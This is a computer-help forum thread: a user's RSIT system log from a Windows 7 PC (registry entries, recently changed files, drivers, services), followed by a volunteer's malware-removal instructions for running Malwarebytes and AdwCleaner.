"SecurityProviders"=credssp.dll

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\CleanHlp]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\CleanHlp.sys]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\AFD]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\CleanHlp]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\CleanHlp.sys]

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System]

"ConsentPromptBehaviorAdmin"=5

"ConsentPromptBehaviorUser"=3

"EnableUIADesktopToggle"=0

"dontdisplaylastusername"=0

"legalnoticecaption"=

"legalnoticetext"=

"shutdownwithoutlogon"=1

"undockwithoutlogon"=1

"DisableCAD"=1

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\explorer]

"NoActiveDesktop"=1

"NoActiveDesktopChanges"=1

"ForceActiveDesktopOn"=0

[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\standardprofile\authorizedapplications\list]

[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\domainprofile\authorizedapplications\list]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32]

"vidc.mrle"=msrle32.dll

"vidc.msvc"=msvidc32.dll

"msacm.imaadpcm"=imaadp32.acm

"msacm.msg711"=msg711.acm

"msacm.msgsm610"=msgsm32.acm

"msacm.msadpcm"=msadp32.acm

"midimapper"=midimap.dll

"wavemapper"=msacm32.drv

"VIDC.UYVY"=msyuv.dll

"VIDC.YUY2"=msyuv.dll

"VIDC.YVYU"=msyuv.dll

"VIDC.IYUV"=iyuv_32.dll

"vidc.i420"=iyuv_32.dll

"VIDC.YVU9"=tsbyuv.dll

"msacm.l3acm"=C:\Windows\System32\l3codeca.acm

"MSVideo8"=VfWWDM32.dll

"wave1"=wdmaud.drv

"midi1"=wdmaud.drv

"mixer1"=wdmaud.drv

"aux1"=wdmaud.drv

"wave"=wdmaud.drv

"midi"=wdmaud.drv

"mixer"=wdmaud.drv

"aux"=wdmaud.drv

"wave2"=wdmaud.drv

"mixer2"=wdmaud.drv

"midi2"=wdmaud.drv

======File associations======

.js - edit - C:\Windows\System32\Notepad.exe %1

.js - open - C:\Windows\System32\WScript.exe "%1" %*

======List of files/folders created in the last 1 month======

2014-11-28 19:06:22 ----D---- C:\Program Files\trend micro

2014-11-28 19:06:21 ----D---- C:\rsit

2014-11-28 15:50:00 ----D---- C:\Program Files (x86)\Emsisoft Anti-Malware

2014-11-27 12:19:15 ----A---- C:\Windows\SYSWOW64\FlashPlayerInstaller.exe

2014-11-25 20:57:13 ----D---- C:\Program Files (x86)\ESET

2014-11-25 20:08:41 ----D---- C:\ProgramData\HitmanPro

2014-11-25 16:22:04 ----D---- C:\Program Files (x86)\BuyNsave

2014-11-25 16:21:54 ----D---- C:\ProgramData\13031386700010600142

2014-11-25 16:21:53 ----D---- C:\ProgramData\fglelgmopjjbdjgcgecdmkpfdagmmgef

2014-11-20 11:08:06 ----A---- C:\Windows\SYSWOW64\pku2u.dll

2014-11-20 11:08:06 ----A---- C:\Windows\system32\pku2u.dll

2014-11-20 11:08:06 ----A---- C:\Windows\system32\kerberos.dll

2014-11-20 11:08:05 ----A---- C:\Windows\SYSWOW64\kerberos.dll

2014-11-17 16:13:27 ----D---- C:\Users\Jordan\AppData\Roaming\MetaGeek

2014-11-15 20:44:51 ----D---- C:\Program Files (x86)\Mozilla Firefox

2014-11-12 16:02:58 ----D---- C:\Users\Jordan\AppData\Roaming\uTorrent

2014-11-12 15:41:26 ----A---- C:\Windows\SYSWOW64\adtschema.dll

2014-11-12 15:41:26 ----A---- C:\Windows\system32\termsrv.dll

2014-11-12 15:41:26 ----A---- C:\Windows\system32\drivers\ksecpkg.sys

2014-11-12 15:41:26 ----A---- C:\Windows\system32\adtschema.dll

2014-11-12 15:41:25 ----A---- C:\Windows\system32\lsasrv.dll

2014-11-12 15:41:24 ----A---- C:\Windows\SYSWOW64\sspicli.dll

2014-11-12 15:41:24 ----A---- C:\Windows\SYSWOW64\secur32.dll

2014-11-12 15:41:24 ----A---- C:\Windows\SYSWOW64\msaudite.dll

2014-11-12 15:41:24 ----A---- C:\Windows\system32\msaudite.dll

2014-11-12 15:41:09 ----A---- C:\Windows\SYSWOW64\ieetwproxystub.dll

2014-11-12 15:41:08 ----A---- C:\Windows\SYSWOW64\mshtmled.dll

2014-11-12 15:41:08 ----A---- C:\Windows\SYSWOW64\iernonce.dll

2014-11-12 15:41:08 ----A---- C:\Windows\system32\ieetwproxystub.dll

2014-11-12 15:41:08 ----A---- C:\Windows\system32\ieetwcollector.exe

2014-11-12 15:41:07 ----A---- C:\Windows\SYSWOW64\urlmon.dll

2014-11-12 15:41:07 ----A---- C:\Windows\SYSWOW64\msfeeds.dll

2014-11-12 15:41:07 ----A---- C:\Windows\SYSWOW64\JavaScriptCollectionAgent.dll

2014-11-12 15:41:07 ----A---- C:\Windows\SYSWOW64\iedkcs32.dll

2014-11-12 15:41:07 ----A---- C:\Windows\SYSWOW64\dxtrans.dll

2014-11-12 15:41:07 ----A---- C:\Windows\system32\JavaScriptCollectionAgent.dll

2014-11-12 15:41:07 ----A---- C:\Windows\system32\iernonce.dll

2014-11-12 15:41:07 ----A---- C:\Windows\system32\ie4uinit.exe

2014-11-12 15:41:06 ----A---- C:\Windows\SYSWOW64\mshtml.dll

2014-11-12 15:41:05 ----A---- C:\Windows\SYSWOW64\iesetup.dll

2014-11-12 15:41:05 ----A---- C:\Windows\SYSWOW64\ieapfltr.dll

2014-11-12 15:41:05 ----A---- C:\Windows\system32\urlmon.dll

2014-11-12 15:41:05 ----A---- C:\Windows\system32\iedkcs32.dll

2014-11-12 15:41:04 ----A---- C:\Windows\SYSWOW64\jscript9diag.dll

2014-11-12 15:41:04 ----A---- C:\Windows\SYSWOW64\iertutil.dll

2014-11-12 15:41:04 ----A---- C:\Windows\system32\ieetwcollectorres.dll

2014-11-12 15:41:03 ----A---- C:\Windows\SYSWOW64\jsproxy.dll

2014-11-12 15:41:03 ----A---- C:\Windows\SYSWOW64\ieUnatt.exe

2014-11-12 15:41:03 ----A---- C:\Windows\SYSWOW64\ieui.dll

2014-11-12 15:41:03 ----A---- C:\Windows\SYSWOW64\dxtmsft.dll

2014-11-12 15:41:03 ----A---- C:\Windows\system32\MsSpellCheckingFacility.exe

2014-11-12 15:41:03 ----A---- C:\Windows\system32\msfeeds.dll

2014-11-12 15:41:03 ----A---- C:\Windows\system32\dxtrans.dll

2014-11-12 15:41:02 ----A---- C:\Windows\SYSWOW64\ieframe.dll

2014-11-12 15:41:02 ----A---- C:\Windows\system32\iesetup.dll

2014-11-12 15:41:01 ----A---- C:\Windows\system32\ieapfltr.dll

2014-11-12 15:41:00 ----A---- C:\Windows\system32\iertutil.dll

2014-11-12 15:40:58 ----A---- C:\Windows\SYSWOW64\mshtmlmedia.dll

2014-11-12 15:40:58 ----A---- C:\Windows\SYSWOW64\jscript9.dll

2014-11-12 15:40:57 ----A---- C:\Windows\SYSWOW64\wininet.dll

2014-11-12 15:40:57 ----A---- C:\Windows\SYSWOW64\vbscript.dll

2014-11-12 15:40:57 ----A---- C:\Windows\SYSWOW64\msrating.dll

2014-11-12 15:40:57 ----A---- C:\Windows\SYSWOW64\MshtmlDac.dll

2014-11-12 15:40:57 ----A---- C:\Windows\system32\jsproxy.dll

2014-11-12 15:40:57 ----A---- C:\Windows\system32\ieUnatt.exe

2014-11-12 15:40:56 ----A---- C:\Windows\system32\ieui.dll

2014-11-12 15:40:56 ----A---- C:\Windows\system32\ieframe.dll

2014-11-12 15:40:56 ----A---- C:\Windows\system32\dxtmsft.dll

2014-11-12 15:40:55 ----A---- C:\Windows\system32\mshtmled.dll

2014-11-12 15:40:54 ----A---- C:\Windows\system32\mshtmlmedia.dll

2014-11-12 15:40:54 ----A---- C:\Windows\system32\jscript9diag.dll

2014-11-12 15:40:54 ----A---- C:\Windows\system32\jscript9.dll

2014-11-12 15:40:53 ----A---- C:\Windows\system32\wininet.dll

2014-11-12 15:40:53 ----A---- C:\Windows\system32\vbscript.dll

2014-11-12 15:40:52 ----A---- C:\Windows\system32\MshtmlDac.dll

2014-11-12 15:40:51 ----A---- C:\Windows\system32\msrating.dll

2014-11-12 15:40:50 ----A---- C:\Windows\system32\mshtml.dll

2014-11-12 15:40:09 ----A---- C:\Windows\SYSWOW64\msxml3.dll

2014-11-12 15:40:09 ----A---- C:\Windows\system32\msxml3.dll

2014-11-12 15:40:07 ----A---- C:\Windows\SYSWOW64\msxml3r.dll

2014-11-12 15:40:07 ----A---- C:\Windows\system32\msxml3r.dll

2014-11-12 15:40:04 ----A---- C:\Windows\SYSWOW64\IMJP10K.DLL

2014-11-12 15:40:04 ----A---- C:\Windows\system32\IMJP10K.DLL

2014-11-12 15:40:00 ----A---- C:\Windows\SYSWOW64\AudioSes.dll

2014-11-12 15:40:00 ----A---- C:\Windows\SYSWOW64\AUDIOKSE.dll

2014-11-12 15:40:00 ----A---- C:\Windows\SYSWOW64\AudioEng.dll

2014-11-12 15:40:00 ----A---- C:\Windows\system32\EncDump.dll

2014-11-12 15:40:00 ----A---- C:\Windows\system32\audiosrv.dll

2014-11-12 15:40:00 ----A---- C:\Windows\system32\AudioSes.dll

2014-11-12 15:40:00 ----A---- C:\Windows\system32\AUDIOKSE.dll

2014-11-12 15:40:00 ----A---- C:\Windows\system32\AudioEng.dll

2014-11-12 15:39:52 ----A---- C:\Windows\system32\schannel.dll

2014-11-12 15:39:51 ----A---- C:\Windows\system32\ncrypt.dll

2014-11-12 15:39:50 ----A---- C:\Windows\SYSWOW64\wdigest.dll

2014-11-12 15:39:50 ----A---- C:\Windows\SYSWOW64\TSpkg.dll

2014-11-12 15:39:50 ----A---- C:\Windows\SYSWOW64\schannel.dll

2014-11-12 15:39:50 ----A---- C:\Windows\SYSWOW64\ncrypt.dll

2014-11-12 15:39:50 ----A---- C:\Windows\SYSWOW64\msv1_0.dll

2014-11-12 15:39:50 ----A---- C:\Windows\SYSWOW64\credssp.dll

2014-11-12 15:39:50 ----A---- C:\Windows\system32\wdigest.dll

2014-11-12 15:39:50 ----A---- C:\Windows\system32\TSpkg.dll

2014-11-12 15:39:50 ----A---- C:\Windows\system32\msv1_0.dll

2014-11-12 15:39:50 ----A---- C:\Windows\system32\credssp.dll

2014-11-12 15:39:33 ----A---- C:\Windows\SYSWOW64\packager.dll

2014-11-12 15:39:33 ----A---- C:\Windows\system32\win32k.sys

2014-11-12 15:39:33 ----A---- C:\Windows\system32\packager.dll

2014-11-12 15:39:28 ----A---- C:\Windows\SYSWOW64\msi.dll

2014-11-12 15:39:28 ----A---- C:\Windows\system32\msi.dll

2014-11-12 15:39:22 ----A---- C:\Windows\SYSWOW64\oleaut32.dll

2014-11-12 15:39:22 ----A---- C:\Windows\system32\oleaut32.dll

2014-11-08 10:44:54 ----D---- C:\Users\Jordan\AppData\Roaming\KeePass

2014-11-08 10:44:07 ----D---- C:\Program Files (x86)\KeePass Password Safe

2014-10-30 09:10:05 ----A---- C:\Windows\system32\drivers\ssudmdm.sys

2014-10-30 09:10:05 ----A---- C:\Windows\system32\drivers\ssudbus.sys

2014-10-30 09:08:30 ----A---- C:\Windows\SYSWOW64\secman.dll

2014-10-29 21:35:16 ----A---- C:\Windows\system32\drivers\avgidsdrivera.sys

======List of files/folders modified in the last 1 month======

2014-11-28 19:06:22 ----RD---- C:\Program Files

2014-11-28 19:06:01 ----D---- C:\Windows\Temp

2014-11-28 19:05:53 ----A---- C:\Windows\SYSWOW64\TempWmicBatchFile.bat

2014-11-28 16:26:20 ----D---- C:\Users\Jordan\AppData\Roaming\Dropbox

2014-11-28 15:59:58 ----RD---- C:\Program Files (x86)

2014-11-28 15:59:58 ----D---- C:\Windows\system32\drivers

2014-11-28 15:42:42 ----D---- C:\Windows\system32\config

2014-11-28 15:38:48 ----AD---- C:\ProgramData\TEMP

2014-11-28 15:38:21 ----D---- C:\Program Files (x86)\SpywareBlaster

2014-11-28 15:33:31 ----D---- C:\Windows\System32

2014-11-28 15:30:11 ----D---- C:\ProgramData\MFAData

2014-11-27 12:57:53 ----D---- C:\Windows\system32\catroot2

2014-11-27 12:19:55 ----D---- C:\Windows\Prefetch

2014-11-27 12:19:53 ----A---- C:\Windows\SYSWOW64\FlashPlayerApp.exe

2014-11-27 12:19:25 ----SHD---- C:\Windows\Installer

2014-11-27 12:19:25 ----SHD---- C:\Config.Msi

2014-11-27 12:19:15 ----D---- C:\Windows\SysWOW64

2014-11-25 20:29:01 ----SHD---- C:\System Volume Information

2014-11-25 20:08:41 ----HD---- C:\ProgramData

2014-11-25 16:37:37 ----D---- C:\Users\Jordan\AppData\Roaming\vlc

2014-11-25 16:22:06 ----D---- C:\ProgramData\AVG2015

2014-11-23 11:55:52 ----D---- C:\Windows\pss

2014-11-22 19:25:11 ----D---- C:\Users\Jordan\AppData\Roaming\HandBrake

2014-11-21 16:44:24 ----D---- C:\Windows\winsxs

2014-11-20 11:03:51 ----D---- C:\Windows\system32\catroot

2014-11-18 12:05:32 ----D---- C:\Windows\Microsoft.NET

2014-11-18 11:31:35 ----D---- C:\Windows\inf

2014-11-18 11:31:35 ----A---- C:\Windows\system32\PerfStringBackup.INI

2014-11-18 10:13:36 ----RSD---- C:\Windows\assembly

2014-11-16 15:40:28 ----D---- C:\Program Files (x86)\Mozilla Maintenance Service

2014-11-16 10:37:29 ----HD---- C:\$AVG

2014-11-15 16:35:57 ----D---- C:\Users\Jordan\AppData\Roaming\dvdcss

2014-11-15 15:48:14 ----D---- C:\Windows\Tasks

2014-11-12 16:35:55 ----D---- C:\Windows\SYSWOW64\nl-NL

2014-11-12 16:35:55 ----D---- C:\Windows\system32\nl-NL

2014-11-12 16:35:54 ----D---- C:\Windows\SYSWOW64\en-US

2014-11-12 16:35:54 ----D---- C:\Windows\system32\en-US

2014-11-12 16:35:54 ----D---- C:\Program Files\Internet Explorer

2014-11-12 16:35:54 ----D---- C:\Program Files (x86)\Internet Explorer

2014-11-12 16:35:48 ----D---- C:\ProgramData\Microsoft Help

2014-11-12 16:32:35 ----D---- C:\Windows\system32\MRT

2014-11-12 16:25:06 ----A---- C:\Windows\system32\MRT.exe

2014-11-08 11:22:14 ----D---- C:\Program Files\Recuva

2014-11-07 21:25:42 ----D---- C:\Windows\system32\Tasks

2014-10-30 11:28:39 ----D---- C:\Users\Jordan\AppData\Roaming\TeamViewer

2014-10-30 11:21:39 ----D---- C:\Program Files\CCleaner

2014-10-30 11:20:34 ----D---- C:\Users\Jordan\AppData\Roaming\Samsung

2014-10-30 11:20:34 ----D---- C:\Program Files (x86)\Samsung

2014-10-30 11:20:31 ----D---- C:\Program Files (x86)\InstallShield Installation Information

2014-10-30 11:19:10 ----D---- C:\ProgramData\Samsung

2014-10-30 11:18:47 ----D---- C:\Windows

2014-10-30 09:40:37 ----D---- C:\Windows\system32\DriverStore

======List of drivers (R=Running, S=Stopped, 0=Boot, 1=System, 2=Auto, 3=Demand, 4=Disabled)======

R0 amd_sata;amd_sata; C:\Windows\system32\DRIVERS\amd_sata.sys [2012-10-11 82600]

R0 amd_xata;amd_xata; C:\Windows\system32\DRIVERS\amd_xata.sys [2012-10-11 42664]

R0 AVGIDSHA;AVGIDSHA; C:\Windows\system32\DRIVERS\avgidsha.sys [2014-06-18 190744]

R0 Avgloga;AVG Logging Driver; C:\Windows\system32\DRIVERS\avgloga.sys [2014-07-18 313624]

R0 Avgmfx64;AVG Mini-Filter Resident Anti-Virus Shield; C:\Windows\system32\DRIVERS\avgmfx64.sys [2014-10-05 124184]

R0 Avgrkx64;AVG Anti-Rootkit Driver; C:\Windows\system32\DRIVERS\avgrkx64.sys [2014-06-18 31512]

R0 iusb3hcs;Intel® USB 3.0 hostcontrollerswitch-stuurprogramma; C:\Windows\system32\DRIVERS\iusb3hcs.sys [2013-02-22 20464]

R0 rdyboost;ReadyBoost; C:\Windows\System32\drivers\rdyboost.sys [2010-11-21 213888]

R1 A2DDA;A2 Direct Disk Access Support Driver; \??\C:\Program Files (x86)\Emsisoft Anti-Malware\a2ddax64.sys [2013-03-28 26176]

R1 Avgdiska;AVG Disk Driver; C:\Windows\system32\DRIVERS\avgdiska.sys [2014-06-18 153368]

R1 AVGIDSDriver;AVGIDSDriver; C:\Windows\system32\DRIVERS\avgidsdrivera.sys [2014-10-29 263960]

R1 Avgldx64;AVG AVI Loader Driver; C:\Windows\system32\DRIVERS\avgldx64.sys [2014-08-28 243480]

R1 Avgtdia;AVG TDI Driver; C:\Windows\system32\DRIVERS\avgtdia.sys [2014-10-10 274200]

R1 CSC;@%systemroot%\system32\cscsvc.dll,-202; C:\Windows\system32\drivers\csc.sys [2010-11-21 514560]

R1 vwififlt;Virtual WiFi Filter Driver; C:\Windows\system32\DRIVERS\vwififlt.sys [2009-07-14 59904]

R3 a2acc;a2acc; \??\C:\PROGRAM FILES (X86)\EMSISOFT ANTI-MALWARE\a2accx64.sys [2014-05-12 71472]

R3 amdhub30;AMD USB 3.0 Hub Driver; C:\Windows\system32\DRIVERS\amdhub30.sys [2012-11-28 107688]

R3 amdkmdag;amdkmdag; C:\Windows\system32\DRIVERS\atikmdag.sys [2013-02-14 11635200]

R3 amdkmdap;amdkmdap; C:\Windows\system32\DRIVERS\atikmpag.sys [2013-02-14 578560]

R3 amdxhc;AMD USB 3.0 Host Controller Driver; C:\Windows\system32\DRIVERS\amdxhc.sys [2012-11-28 228008]

R3 AthBTPort;Qualcomm Atheros Virtual Bluetooth Class; C:\Windows\system32\DRIVERS\btath_flt.sys [2012-08-10 88728]

R3 athr;Qualcomm Atheros Extensible Wireless LAN device driver; C:\Windows\system32\DRIVERS\athrx.sys [2013-03-11 3879936]

R3 AtiHDAudioService;AMD Function Driver for HD Audio Service; C:\Windows\system32\drivers\AtihdW76.sys [2012-02-23 95760]

R3 BTATH_A2DP;Bluetooth A2DP Audio Driver; C:\Windows\system32\drivers\btath_a2dp.sys [2012-08-10 344216]

R3 btath_avdt;Qualcomm Atheros Bluetooth AVDT Service; C:\Windows\system32\drivers\btath_avdt.sys [2012-08-10 114840]

R3 BTATH_BUS;Qualcomm Atheros Bluetooth Bus; C:\Windows\system32\DRIVERS\btath_bus.sys [2012-08-10 33944]

R3 BTATH_HCRP;Bluetooth HCRP Server driver; C:\Windows\system32\DRIVERS\btath_hcrp.sys [2012-08-10 178840]

R3 BTATH_LWFLT;Bluetooth LWFLT Device; C:\Windows\system32\DRIVERS\btath_lwflt.sys [2012-08-10 77464]

R3 BTATH_RCP;Bluetooth AVRCP Device; C:\Windows\system32\DRIVERS\btath_rcp.sys [2012-08-10 135832]

R3 BtFilter;BtFilter; C:\Windows\system32\DRIVERS\btfilter.sys [2012-08-10 567808]

R3 BthEnum;Bluetooth-stuurprogramma voor aanvraagblok; C:\Windows\system32\DRIVERS\BthEnum.sys [2009-07-14 41984]

R3 BthPan;Bluetooth-apparaat (Personal Area Network); C:\Windows\system32\DRIVERS\bthpan.sys [2009-07-14 118784]

R3 BTHUSB;USB-stuurprogramma voor Bluetooth-radio; C:\Windows\System32\Drivers\BTHUSB.sys [2011-04-28 80384]

R3 cleanhlp;cleanhlp; \??\C:\Program Files (x86)\Emsisoft Anti-Malware\cleanhlp64.sys [2013-12-04 57024]

R3 CnxtHdAudService;Conexant UAA Function Driver for High Definition Audio Service; C:\Windows\system32\drivers\CHDRT64.sys [2012-08-20 1608864]

R3 ETD;ELAN PS/2 Port Input Device; C:\Windows\system32\DRIVERS\ETD.sys [2012-10-05 328592]

R3 L1C;NDIS Miniport Driver for Qualcomm Atheros AR81xx PCI-E Ethernet Controller; C:\Windows\system32\DRIVERS\L1C62x64.sys [2013-03-04 127568]

R3 MBAMSwissArmy;MBAMSwissArmy; \??\C:\Windows\system32\drivers\MBAMSwissArmy.sys []

R3 PSI;PSI; C:\Windows\system32\DRIVERS\psi_mf_amd64.sys [2013-12-06 18456]

R3 RFCOMM;Bluetooth-apparaat (RFCOMM Protocol TDI); C:\Windows\system32\DRIVERS\rfcomm.sys [2009-07-14 158720]

R3 rtsuvc;Realtek USB 2.0 PC Camera; C:\Windows\system32\DRIVERS\rtsuvc.sys [2013-03-06 8243144]

R3 sdbus;sdbus; C:\Windows\system32\DRIVERS\sdbus.sys [2010-11-21 109056]

S3 AmUStor;AM USB Stroage Driver; C:\Windows\system32\drivers\AmUStor.SYS [2013-10-18 100992]

S3 ApfiltrService;Alps Pointing-device Filter Driver; C:\Windows\system32\DRIVERS\Apfiltr.sys []

S3 BTHPORT;Stuurprogramma voor Bluetooth-poort; C:\Windows\System32\Drivers\BTHport.sys [2012-07-06 552960]

S3 dg_ssudbus;SAMSUNG Mobile USB Composite Device Driver (DEVGURU Ver.); C:\Windows\system32\DRIVERS\ssudbus.sys [2014-06-16 110336]

S3 dmvsc;dmvsc; C:\Windows\system32\drivers\dmvsc.sys [2010-11-21 71168]

S3 pciide;pciide; C:\Windows\system32\drivers\pciide.sys [2009-07-14 12352]

S3 PSKMAD;PSKMAD; C:\Windows\System32\DRIVERS\PSKMAD.sys [2013-04-29 47632]

S3 RDPDR;Terminal Server Device Redirector Driver; C:\Windows\System32\drivers\rdpdr.sys [2010-11-21 165888]

S3 RdpVideoMiniport;Remote Desktop Video Miniport Driver; C:\Windows\System32\drivers\rdpvideominiport.sys [2012-08-23 19456]

S3 s3cap;s3cap; C:\Windows\system32\drivers\vms3cap.sys [2010-11-21 6656]

S3 ssudmdm;SAMSUNG Mobile USB Modem Drivers (DEVGURU Ver.); C:\Windows\system32\DRIVERS\ssudmdm.sys [2014-06-16 206080]

S3 ssudserd;SAMSUNG Mobile USB Diagnostic Serial Port(DEVGURU Ver.); C:\Windows\system32\DRIVERS\ssudserd.sys [2014-01-22 206080]

S3 storvsc;storvsc; C:\Windows\system32\drivers\storvsc.sys [2010-11-21 34688]

S3 Synth3dVsc;Synth3dVsc; C:\Windows\System32\drivers\synth3dvsc.sys [2010-11-21 88960]

S3 terminpt;Microsoft Remote Desktop Input Driver; C:\Windows\system32\drivers\terminpt.sys [2012-08-23 29696]

S3 TsUsbFlt;TsUsbFlt; C:\Windows\system32\drivers\tsusbflt.sys [2013-10-02 56832]

S3 TsUsbGD;Remote Desktop Generic USB Device; C:\Windows\system32\drivers\TsUsbGD.sys [2012-08-23 30208]

S3 tsusbhub;@%SystemRoot%\system32\drivers\tsusbhub.sys,-1; C:\Windows\system32\drivers\tsusbhub.sys [2010-11-21 117248]

S3 usbrndis6;USB RNDIS6-adapter; C:\Windows\system32\DRIVERS\usb80236.sys [2013-02-12 19968]

S3 usbscan;Stuurprogramma voor USB-scanner; C:\Windows\system32\DRIVERS\usbscan.sys [2013-07-03 42496]

S3 VGPU;VGPU; C:\Windows\System32\drivers\rdvgkmd.sys []

S3 vmbus;vmbus; C:\Windows\system32\drivers\vmbus.sys [2010-11-21 199552]

S3 VMBusHID;VMBusHID; C:\Windows\system32\drivers\VMBusHID.sys [2010-11-21 21760]

S3 vwifimp;Microsoft Virtual WiFi Miniport Service; C:\Windows\system32\DRIVERS\vwifimp.sys [2009-07-14 17920]

======List of services (R=Running, S=Stopped, 0=Boot, 1=System, 2=Auto, 3=Demand, 4=Disabled)======

R2 a2AntiMalware;Emsisoft Protection Service; C:\Program Files (x86)\Emsisoft Anti-Malware\a2service.exe [2014-10-13 4816568]

R2 AdobeARMservice;Adobe Acrobat Update Service; C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe [2014-09-12 64704]

R2 AMD External Events Utility;AMD External Events Utility; C:\Windows\system32\atiesrxx.exe [2013-02-14 240640]

R2 AtherosSvc;AtherosSvc; C:\Program Files (x86)\Bluetooth Suite\adminservice.exe [2012-08-10 211584]

R2 AVGIDSAgent;AVGIDSAgent; C:\Program Files (x86)\AVG\AVG2015\avgidsagent.exe [2014-11-09 3488784]

R2 avgwd;AVG WatchDog; C:\Program Files (x86)\AVG\AVG2015\avgwdsvc.exe [2014-11-09 298080]

R2 CronService;Cron Service for Prey; C:\Prey\platform\windows\cronsvc.exe [2013-05-08 23552]

R2 CscService;@%systemroot%\system32\cscsvc.dll,-200; C:\Windows\System32\svchost.exe [2009-07-14 27136]

R2 CxAudMsg;@C:\Windows\system32\CxAudMsg64.exe,-100; C:\Windows\system32\CxAudMsg64.exe [2013-10-18 201376]

R2 Secunia PSI Agent;Secunia PSI Agent; C:\Program Files (x86)\Secunia\PSI\PSIA.exe [2013-12-06 1229528]

R2 Secunia Update Agent;Secunia Update Agent; C:\Program Files (x86)\Secunia\PSI\sua.exe [2013-12-06 662232]

R2 TeamViewer8;TeamViewer 8; C:\Program Files (x86)\TeamViewer\Version8\TeamViewer_Service.exe [2013-10-01 5087584]

R2 Virtual Router;VirtualRouterService; C:\Program Files (x86)\Virtual Router\VirtualRouterService.exe [2013-02-10 12288]

S2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86; C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe [2013-09-11 105144]

S2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64; C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [2013-09-11 124088]

S2 gupdate;Google Update-service (gupdate); C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2013-12-20 116648]

S3 AdobeFlashPlayerUpdateSvc;Adobe Flash Player Update Service; C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2014-11-27 267440]

S3 AppMgmt;@appmgmts.dll,-3250; C:\Windows\system32\svchost.exe [2009-07-14 27136]

S3 gupdatem;Google Update-service (gupdatem); C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2013-12-20 116648]

S3 gusvc;Google Updater Service; C:\Program Files (x86)\Google\Common\Google Updater\GoogleUpdaterService.exe [2014-03-05 136120]

S3 IEEtwCollectorService;@%SystemRoot%\system32\ieetwcollectorres.dll,-1000; C:\Windows\system32\IEEtwCollector.exe [2014-11-06 114688]

S3 Microsoft Office Groove Audit Service;Microsoft Office Groove Audit Service; C:\Program Files (x86)\Microsoft Office\Office12\GrooveAuditService.exe [2009-02-26 64856]

S3 MozillaMaintenance;Mozilla Maintenance Service; C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe [2014-11-15 114288]

S3 odserv;Microsoft Office Diagnostics Service; C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE12\ODSERV.EXE [2011-07-20 440696]

S3 ose;Office Source Engine; C:\Program Files (x86)\Common Files\Microsoft Shared\Source Engine\OSE.EXE [2006-10-26 145184]

S3 PeerDistSvc;@%SystemRoot%\system32\peerdistsvc.dll,-9000; C:\Windows\System32\svchost.exe [2009-07-14 27136]

S3 UmRdpService;@%SystemRoot%\system32\umrdp.dll,-1000; C:\Windows\System32\svchost.exe [2009-07-14 27136]

S3 WatAdminSvc;@%SystemRoot%\system32\Wat\WatUX.exe,-601; C:\Windows\system32\Wat\WatAdminSvc.exe [2013-10-19 1255736]

S4 aspnet_state;ASP.NET-statusservice; C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe [2013-09-11 51808]

S4 NetMsmqActivator;@C:\Windows\Microsoft.NET\Framework64\v4.0.30319\\ServiceModelInstallRC.dll,-8195; C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe [2013-09-11 139856]

S4 NetPipeActivator;@C:\Windows\Microsoft.NET\Framework64\v4.0.30319\\ServiceModelInstallRC.dll,-8197; C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe [2013-09-11 139856]

S4 NetTcpActivator;@C:\Windows\Microsoft.NET\Framework64\v4.0.30319\\ServiceModelInstallRC.dll,-8199; C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe [2013-09-11 139856]

-----------------EOF-----------------


Hi jordan99 and welcome to PC Helpforum,


  • Log in only as an administrator with full rights.
  • Cleaning up your system can take some time, so please be patient.
  • Stay with this topic until I have told you that your PC is clean.
  • If there is something you do not know or understand, please just ask.
  • Do not install or uninstall any software or hardware while we are working on your problem.
  • In the meantime, do not try something "else"; that only makes it harder for us.

Note: Always run all tools as admin.

The instructions given here are valid only for your PC.


Step 1:

Scanning for and removing malware....

Install MBAM 2.0 (info & download link)

Start MBAM.

Click Scan at the top of the Malwarebytes Anti-Malware window.

On that screen, choose the Threat Scan and then click the Scan Now button.

Before scanning, the program always first checks automatically whether updates to the virus definitions are available;

if an update is available, you must let it install first.

When the scan is finished and threats have been detected, you get an overview of them.

Select the option to place them all in quarantine.

When you are told that your computer must be restarted, click Yes.

After the PC has restarted, if Malwarebytes asked to restart the PC, open Malwarebytes again.

Click the History button at the top of the menu.

Then click the Application Logs option and select the scan log you want to export.

This is the last scan you ran (you can tell by the date and time).

Select it to view it.

In a new window that opens you will see the results of your scan.

At the bottom, either select to export as a text file and give the text file a name, for example mbamlog.

Or you can select to copy to the clipboard, so that the contents of the log are copied to your clipboard and you can paste them into your next post.


Step 2:

Checking for bad toolbars...

Download AdwCleaner by Xplode to your Desktop.


  • Close all open windows
  • Start AdwCleaner
  • Click Scan
  • Click Clean

All icons will disappear from the Desktop; this is normal.

Your PC will be restarted and a log file will open (C:\AdwCleaner\AdwCleaner[xx].txt).

Post its contents here on the forum.

I only need the log from after the "Clean" option.

